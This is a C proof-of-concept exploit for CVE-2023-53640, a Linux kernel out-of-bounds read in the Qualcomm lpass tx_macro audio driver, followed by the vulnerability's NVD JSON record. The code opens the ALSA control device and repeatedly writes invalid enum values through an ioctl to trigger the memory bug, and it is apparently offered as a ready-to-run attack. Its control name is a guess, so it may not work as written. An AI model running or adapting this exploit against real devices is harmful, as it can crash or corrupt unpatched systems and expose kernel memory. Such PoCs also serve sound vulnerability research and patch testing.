CVE-2023-53640

/* CVE-2023-53640 PoC - KASAN slab-out-of-bounds in regcache_flat_read * This PoC triggers the vulnerability through ALSA control interface * targeting the ASoC lpass tx_macro DAI enum control. * * Compile: gcc -o poc_cve_2023_53640 poc.c -lasound * Run: ./poc_cve_2023_53640 * * Note: Requires a system with Qualcomm lpass audio hardware * (e.g., sc7280 CRD platform) and the vulnerable kernel version. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sound/asound.h> #include <sys/ioctl.h> #include <unistd.h> #include <fcntl.h> int main(int argc, char *argv[]) { int fd; const char *card_dev = "/dev/snd/controlC0"; struct snd_ctl_elem_id id; struct snd_ctl_elem_value value; int ret; /* Open the ALSA control device */ fd = open(card_dev, O_RDWR); if (fd < 0) { perror("Failed to open ALSA control device"); return -1; } /* Construct a control element ID targeting the tx_macro DAI enum control * The exact control name depends on the codec driver, but typically * it relates to the TX macro digital interface configuration. */ memset(&id, 0, sizeof(id)); id.iface = SNDRV_CTL_ELEM_IFACE_MIXER; strncpy((char *)id.name, "TX Macro DEC Enum", sizeof(id.name) - 1); id.index = 0; /* Set the control value to trigger the out-of-bounds read * Using an out-of-range enum value to trigger invalid register access */ memset(&value, 0, sizeof(value)); value.id = id; /* Use an invalid enum value to trigger the vulnerability */ value.value.enumerated.item[0] = 0xFFFF; /* Write the control value to trigger the vulnerability */ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &value); if (ret < 0) { fprintf(stderr, "ioctl SNDRV_CTL_IOCTL_ELEM_WRITE failed: %s\n", strerror(errno)); /* Even if ioctl returns error, the kernel may have already * processed the invalid value and triggered the bug */ } /* Try multiple invalid values to increase chances of triggering */ for (int i = 0; i < 100; i++) { value.value.enumerated.item[0] = i * 1000; ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &value); } close(fd); printf("PoC execution completed. Check kernel log for KASAN report.\n"); return 0; }

{"cve": {"id": "CVE-2023-53640", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:47.270", "lastModified": "2026-02-03T22:30:01.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: lpass: Fix for KASAN use_after_free out of bounds\n\nWhen we run syzkaller we get below Out of Bounds error.\n\n\"KASAN: slab-out-of-bounds Read in regcache_flat_read\"\n\nBelow is the backtrace of the issue:\n\nBUG: KASAN: slab-out-of-bounds in regcache_flat_read+0x10c/0x110\nRead of size 4 at addr ffffff8088fbf714 by task syz-executor.4/14144\nCPU: 6 PID: 14144 Comm: syz-executor.4 Tainted: G W\nHardware name: Qualcomm Technologies, Inc. sc7280 CRD platform (rev5+) (DT)\nCall trace:\ndump_backtrace+0x0/0x4ec\nshow_stack+0x34/0x50\ndump_stack_lvl+0xdc/0x11c\nprint_address_description+0x30/0x2d8\nkasan_report+0x178/0x1e4\n__asan_report_load4_noabort+0x44/0x50\nregcache_flat_read+0x10c/0x110\nregcache_read+0xf8/0x5a0\n_regmap_read+0x45c/0x86c\n_regmap_update_bits+0x128/0x290\nregmap_update_bits_base+0xc0/0x15c\nsnd_soc_component_update_bits+0xa8/0x22c\nsnd_soc_component_write_field+0x68/0xd4\ntx_macro_put_dec_enum+0x1d0/0x268\nsnd_ctl_elem_write+0x288/0x474\n\nBy Error checking and checking valid values issue gets rectifies."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.12", "versionEndExcluding": "5.15.114", "matchCriteriaId": "68F8E179-8339-4608-9B4A-2B6B83F723DE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.31", "matchCriteriaId": "79A1436B-7738-4A85-8FE6-B844059F22D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.5", "matchCriteriaId": "34DD94CA-4DA1-41C3-9A9B-92ACD7F4E240"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "38BC6744-7D25-4C02-9966-B224CD071D30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "matchCriteriaId": "76061B41-CAE9-4467-BEDE-0FFC7956F2A1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc3:*:*:*:*:*:*", "matchCriteriaId": "A717BA5B-D535-46A0-A329-A25FE5CEC588"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/75e5fab7db0cecb6e16b22c34608f0b40a4c7cd1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d81d3b0ed3610d24191d24f8e9e20f6775f0cc5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8f1512d78b5de928f4616a871e77b58fd546e651", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f5e61e3fe799ba2fda4320af23d26d28c3302045", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}